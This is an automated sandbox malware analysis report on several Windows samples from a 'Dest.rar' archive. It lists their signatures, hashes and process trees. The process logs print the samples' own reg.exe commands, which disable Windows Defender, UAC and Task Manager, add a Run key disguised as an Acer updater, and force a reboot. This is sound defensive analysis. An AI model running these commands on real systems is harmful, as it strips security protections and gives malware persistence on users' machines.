Malware Analysis Report

2024-11-13 18:03

Sample ID 241108-rjl4wawmdl
Target Dest.rar
SHA256 ceba879db245f9a04c51607671ceeb214afbf10ea12f59bbea9202f94eff65e9
Tags
aspackv2 discovery ransomware upx evasion persistence trojan bootkit exploit
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ceba879db245f9a04c51607671ceeb214afbf10ea12f59bbea9202f94eff65e9

Threat Level: Known bad

The file Dest.rar was found to be: Known bad.

Malicious Activity Summary

aspackv2 discovery ransomware upx evasion persistence trojan bootkit exploit

UAC bypass

Modifies WinLogon for persistence

Possible privilege escalation attempt

Disables Task Manager via registry modification

ASPack v2.12-2.42

Modifies file permissions

Executes dropped EXE

Adds Run key to start application

Writes to the Master Boot Record (MBR)

UPX packed file

Sets desktop wallpaper using registry

Drops file in Windows directory

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Modifies data under HKEY_USERS

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Modifies registry key

Kills process with taskkill

System policy modification

Delays execution with timeout.exe

Modifies Control Panel

Modifies registry class

Suspicious use of WriteProcessMemory

Runs net.exe

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-08 14:13

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-08 14:13

Reported

2024-11-08 14:19

Platform

win11-20241007-en

Max time kernel

292s

Max time network

282s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe"

Signatures

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9347.tmp\CLWCP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9347.tmp\flasher.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\Wallpaper = "c:\\covid20\\bg.bmp" C:\Users\Admin\AppData\Local\Temp\9347.tmp\CLWCP.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\9347.tmp\CLWCP.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\9347.tmp\flasher.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe

"C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9347.tmp\covid.bat" "

C:\Users\Admin\AppData\Local\Temp\9347.tmp\CLWCP.exe

clwcp c:\covid20\bg.bmp

C:\Users\Admin\AppData\Local\Temp\9347.tmp\flasher.exe

flasher 5 c:\covid20\covid.bmp

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9347.tmp\corona.vbs"

Network

Files

memory/1976-0-0x0000000000400000-0x0000000001A7B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9347.tmp\covid.bat

MD5 b08e02e536917f897acb2d21f42f0a97
SHA1 a078f1addfd3eeb0f0cb5fd206ff78e9dc0f3e45
SHA256 2c68caeada2c251c5fc12694b7288a5790114ced4142867179e75d313efaa50c
SHA512 1d1901c3c676bb6d99a39d1a0bab1a6ee378090390bb5e7fe66cf754b8dd772ac0b79ba1215fa758445db1deac200afcc5e1e1e32b2562df946c82b530ca95ab

C:\Users\Admin\AppData\Local\Temp\9347.tmp\bg.bmp

MD5 cb065726febf9c1a581f3008e678f524
SHA1 f9a0058a57213cf7ce72eddf0616a938c8f4f4b1
SHA256 d8f864128f2a79e2ff8179255ebfd06619325fec86103722b6418c3cbb41823f
SHA512 b54a81cff5951b34478e777bc27cc4fd4a292b548f38162602c01e2594848e40fcfea5becfd789153c9a4fa75c354834a3a37cf3032c9857e9246bf850d24880

C:\Users\Admin\AppData\Local\Temp\9347.tmp\covid.bmp

MD5 738bbd119d8877f8342e1ff00fe60dff
SHA1 fc11d85e3c5b46bd877e06985fec1a601ce396ed
SHA256 548c9e22a04650efec06a0414d205d24600e08e0fac1beed7e8b4c03730962bb
SHA512 f7a12c9a1403c9a1953387c5871d6e7865ba80c405f37c51f5c3e093bab9235b8a8ba62ad8b27f2079407e9672d47ac365c9cb08033ef349bd8c9906a30fefad

C:\Users\Admin\AppData\Local\Temp\9347.tmp\CLWCP.exe

MD5 e62ee6f1efc85cb36d62ab779db6e4ec
SHA1 da07ec94cf2cb2b430e15bd0c5084996a47ee649
SHA256 13b4ec59785a1b367efb691a3d5c86eb5aaf1ca0062521c4782e1baac6633f8a
SHA512 8142086979ec1ca9675418e94326a40078400aff8587fc613e17164e034badd828e9615589e6cb8b9339da7cdc9bcb8c48e0890c5f288068f4b86ff659670a69

C:\Users\Admin\AppData\Local\Temp\9347.tmp\flasher.exe

MD5 9254ca1da9ff8ad492ca5fa06ca181c6
SHA1 70fa62e6232eae52467d29cf1c1dacb8a7aeab90
SHA256 30676ad5dc94c3fec3d77d87439b2bf0a1aaa7f01900b68002a06f11caee9ce6
SHA512 a84fbbdea4e743f3e41878b9cf6db219778f1479aa478100718af9fc8d7620fc7a3295507e11df39c7863cb896f946514e50368db480796b6603c8de5580685a

C:\Users\Admin\AppData\Local\Temp\9347.tmp\corona.vbs

MD5 e61624dced063c4ba5352bf487f12410
SHA1 40bd08928900cd97f444ffaa78d93dcaf913b274
SHA256 82ac48c4f7edbab182aa0a8c320d5616ccdd2f0e83dc733b91e45521f85462a3
SHA512 2a27db12d2af35e7b51a307eb8860800075867922d3d63a69da608c96bec045f3c64ac757674d2a40d7f4d9e55179fc2bddc17691919e18e109a5d4669c607ac

memory/1976-33-0x0000000000400000-0x0000000001A7B000-memory.dmp

memory/2464-34-0x0000000000400000-0x0000000000484000-memory.dmp

memory/2876-35-0x0000000000400000-0x00000000004A4000-memory.dmp

memory/2876-36-0x0000000000400000-0x00000000004A4000-memory.dmp

memory/2876-37-0x0000000000400000-0x00000000004A4000-memory.dmp

memory/2876-48-0x0000000000400000-0x00000000004A4000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-08 14:13

Reported

2024-11-08 14:14

Platform

win11-20241007-en

Max time kernel

9s

Max time network

12s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Disables Task Manager via registry modification

evasion

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" C:\Windows\SysWOW64\reg.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" C:\Windows\SysWOW64\reg.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\shutdown.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "200" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\shutdown.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2884 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 2884 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 2884 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 3920 wrote to memory of 1320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3920 wrote to memory of 1320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3920 wrote to memory of 1320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3920 wrote to memory of 2532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 2532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 2532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 4756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 4756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 4756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3920 wrote to memory of 244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3920 wrote to memory of 244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3920 wrote to memory of 4840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 4840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 4840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 2368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 2368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 2368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3920 wrote to memory of 4844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3920 wrote to memory of 4844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3920 wrote to memory of 4844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4844 wrote to memory of 1264 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4844 wrote to memory of 1264 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4844 wrote to memory of 1264 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3920 wrote to memory of 1044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\shutdown.exe
PID 3920 wrote to memory of 1044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\shutdown.exe
PID 3920 wrote to memory of 1044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\shutdown.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe

"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A345.tmp\HorrorBob2.bat" "

C:\Windows\SysWOW64\cscript.exe

cscript prompt.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f

C:\Windows\SysWOW64\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"

C:\Windows\SysWOW64\net.exe

net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 00

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa3a12055 /state1:0x41c64e6d

Network

N/A

Files

memory/2884-0-0x0000000000400000-0x000000000132F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A345.tmp\HorrorBob2.bat

MD5 b11c0b55dba339bbe3169584fa0eedd8
SHA1 8c201122fd73cea5d8d2aa2aa6f7c17d99b521d9
SHA256 f73a510ebd7495f8432b489009aeed5ae7c945ccf68ec3baf88605aeefb2d073
SHA512 8424ce9a6af67721c6df13edbfbe9e48ad1eb014e19c6952afd4158c16762cf65092e6ef459a98680673e30c86da9ba9aaf2aca309426b9237bfcf893ed40006

C:\Users\Admin\AppData\Local\Temp\A345.tmp\prompt.vbs

MD5 52ac951762c9b42fb4492dfdde2ba4ae
SHA1 0821a0dea46432fc4db10a2dc6312d42a872ab9f
SHA256 9bc399097468bb1f2f88250cb967b3db4d34d0a7836b73f262afe2b3ad393ba3
SHA512 c91cf111b92f0f3218353e4e1700270730f2cbad54ab5d8fb368c6e87168be39f0b3e5a04d66b11bc5d93d6b4c4d03711b75e29a7af87d75c14dd296ad4ad530

C:\Users\Admin\AppData\Local\Temp\A345.tmp\blood.bmp

MD5 040d29b801e3488f7aee3f9708128eea
SHA1 433591a971325f7529cbb7a1d16645ff65ee10c7
SHA256 fe28980c6e213619a95e5991de2062a0187fc3054418e670e1c67d3c5b6b01de
SHA512 79c64fce68a58fea469bb71dd1e10a3a2c1d4dc024635be2b8e29793bab8c34ba7afd402d47cce7826279512c7906f31fed9fe986024bc03a36dc094f7629826

C:\Users\Admin\AppData\Local\Temp\A345.tmp\Service64.exe

MD5 b53852cb556ec28efc39b986caddb791
SHA1 5ce0819a7b1703f67272fa0f21546d0a8b2d7b0a
SHA256 ae8cd9b5396770fa3c77140246365c3c501ece718b52fd6b7faed85c26b25d2a
SHA512 7da30187b939c91d045dbe9cfe8daa209d539ca865d759bde4be1c8f4f96fac5f5747ec1be1937eb00034bf531391788586c5d6c3ee93c94d88201e3a1d52599

memory/2884-18-0x0000000000400000-0x000000000132F000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-08 14:13

Reported

2024-11-08 14:14

Platform

win11-20241007-en

Max time kernel

4s

Max time network

7s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Disables Task Manager via registry modification

evasion

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\death666 = "C:\\HostFile.exe" C:\Windows\SysWOW64\reg.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Control Panel\Desktop\Wallpaper = "c:\\note.bmp" C:\Windows\SysWOW64\reg.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\shutdown.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "209" C:\Windows\system32\LogonUI.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\shutdown.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4760 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe C:\Windows\SysWOW64\cmd.exe
PID 4760 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe C:\Windows\SysWOW64\cmd.exe
PID 4760 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe C:\Windows\SysWOW64\cmd.exe
PID 2288 wrote to memory of 2140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
